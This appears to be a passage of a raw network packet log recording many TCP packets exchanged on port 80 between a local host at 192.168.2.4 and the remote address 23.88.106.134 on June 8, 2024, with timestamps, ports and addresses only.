Jun 8, 2024 20:22:06.926409960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926414967 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.926426888 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926434994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.926444054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926454067 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.926460028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926466942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.926476955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926487923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.926492929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926506042 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.926511049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926517963 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.926528931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926538944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.926546097 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926554918 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.926563025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926573992 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.926578045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926590919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.926594973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.926608086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.926626921 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.926640034 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.027570009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.027637005 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.027667046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.027714968 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.027746916 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.027746916 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.027748108 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.027767897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.027781963 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.027817965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.027832985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.027869940 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.027882099 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.027903080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.027916908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.027940035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.027949095 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.027981997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.027991056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028024912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028033018 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028060913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028068066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028094053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028105021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028127909 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028136015 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028162003 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028175116 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028192043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028201103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028223991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028234959 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028268099 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028279066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028311968 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028328896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028359890 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028362036 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028397083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028414011 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028451920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028454065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028508902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028536081 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028588057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028588057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028623104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028642893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028656960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028676987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028690100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028702021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028723955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028738976 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028763056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028774977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028809071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028817892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028867960 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028873920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.028913975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.028959990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029006958 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029014111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029048920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029059887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029082060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029089928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029114962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029126883 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029149055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029158115 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029181957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029217005 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029217958 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029241085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029252052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029259920 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029287100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029293060 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029330969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029419899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029448986 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029467106 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029480934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029485941 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029516935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029526949 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029551029 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029558897 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029584885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029593945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029618979 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029628992 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029654026 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029661894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029686928 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029694080 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029721022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029730082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029755116 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029764891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029788017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029798985 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029820919 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029830933 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029863119 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.029864073 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.029907942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.036128998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.036158085 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.036190987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.036190987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.036212921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.036241055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.036261082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.036283970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.036293983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.036322117 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.036339045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.036362886 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037097931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037151098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037152052 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037185907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037195921 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037230968 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037237883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037271976 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037283897 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037307024 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037309885 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037353039 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037389994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037421942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037436008 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037456036 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037466049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037491083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037499905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037535906 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037544012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037586927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037633896 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037667036 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037688971 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037699938 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037699938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037731886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037743092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037763119 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037779093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037795067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037805080 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037828922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037838936 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037863970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037869930 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037899017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037904024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037931919 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037944078 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.037966013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.037976027 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038002014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038009882 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038036108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038048029 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038069963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038079977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038111925 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038175106 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038212061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038219929 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038258076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038261890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038297892 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038305998 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038332939 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038341045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038366079 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038377047 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038399935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038408995 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038434029 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038440943 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038467884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038475990 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038501978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038511992 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038535118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038546085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038569927 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038577080 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038604021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038611889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038638115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038647890 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038682938 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038714886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038748980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038759947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038796902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.038949966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.038984060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039000034 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039016962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039031029 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039052010 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039066076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039086103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039104939 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039119005 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039129019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039153099 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039170027 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039186001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039190054 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039218903 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039232969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039252043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039268017 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039288044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039305925 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039321899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039393902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039413929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039417028 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039463043 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039601088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039629936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039659977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039661884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039681911 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039696932 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039704084 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039729118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039746046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039782047 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039794922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039829016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039846897 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039861917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039870977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039896011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039911032 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039930105 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039948940 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039963007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.039972067 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.039997101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040010929 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040030003 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040046930 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040064096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040076971 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040096998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040112019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040132046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040149927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040165901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040179014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040201902 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040218115 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040236950 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040255070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040271997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040285110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040306091 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040324926 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040338993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040348053 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040371895 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040390015 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040420055 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040478945 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040545940 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040560007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040594101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040616989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040632963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040637016 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040666103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040683985 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040700912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040714025 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040735960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040749073 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040770054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040787935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040805101 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040812016 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040849924 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040879965 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040914059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040929079 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040946960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040961027 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.040981054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.040996075 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.041023016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.041023970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.041057110 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.041074038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.041090965 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.041104078 CEST	49731	80	192.168.2.4	23.88.106.134
